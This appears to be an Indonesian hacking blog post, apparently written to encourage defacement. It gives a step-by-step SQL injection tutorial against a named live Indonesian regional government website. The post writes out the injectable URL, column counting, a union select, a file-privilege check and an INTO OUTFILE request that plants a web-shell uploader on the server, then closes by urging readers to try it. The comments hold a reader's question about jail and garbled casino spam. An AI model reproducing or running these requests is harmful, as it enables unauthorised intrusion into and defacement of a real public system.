SQL INTO OUTFILE UPSHELL LIVE TARGET GO.ID

Assalamualaikum



Hello gengs

Kembali lagi bersama saya hasby

Kali ini saya akan sharing cara deface poc sqli into outfile ,tanpa berlama2 kita lgsng praktek aja 

Bahan? Uploader (yang sudah di hex decode)

Live target? http://dpmptsp-perizinan.buolkab.go.id/

ok pertama2 kita cari param nya dlu

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9

Kita kasih (') di samping param nya 

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9'



Muncul "Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\dpmptsp-kabupaten.buol\website\berita_selengkapnya.php on line 8"

Kita balancing dlu 

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9'--+-





Tampak kembali seperti tampilan pertama ,itu menandakan vuln

Lanjut kita order

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+10--+-   ~> eror

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+9--+-  ~> eror

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+8--+-   ~> eror

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+7--+-  ~> kembali seperti semula

Berarti column nya ada 7 ,lanjut kita union select

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,3,4,5,6,7--+-





Boom ,keluar angka ajaib nya

Angka ajaib nya ada

7,2,3 

Kita cek dlu file priv nya 

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,file_priv,4,5,6,7+from+mysql.user--+-  ~> kalo ada keluar hirup Y itu bisa eksekusi into outfile,langsung saja kita eksekusi



Kasih uploader di angka ajaib nya+directory nya

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,uploader,4,5,6,7+INTO+OUTFILE+'C:/xampp/htdocs/dpmptsp-kabupaten.buol/website/shell.php'--+- 

 boom ,kok eror? ,Eror bukan berarti gagal ,kita coba akses uploader kita , namaweb.go.id/namashell.php

Sebagai contoh ~> http://dpmptsp-perizinan.buolkab.go.id/website/shell.php



Boom itu bisa upshell 


Selamat mencoba 

2 Komentar

  1. masuk penjara enggak bang klo udh berhasil ke depes(⁠‘⁠◉⁠⌓⁠◉⁠’⁠)

    BalasHapus
  2. We appeared for on-line casinos would possibly be} straightforward to navigate on a smartphone or pill, have a neat consumer interface and a modern 카지노사이트 design, and feature bug-free, fast-loading video games. Super Slots is a relatively new casino, being launched in 2020. Super Slots has established itself as one of the top on-line casinos for slots within brief time|a short while}. Nearly each on-line casino presents more than one kind of slot game.

    BalasHapus
Posting Komentar
Lebih baru Lebih lama

Terkini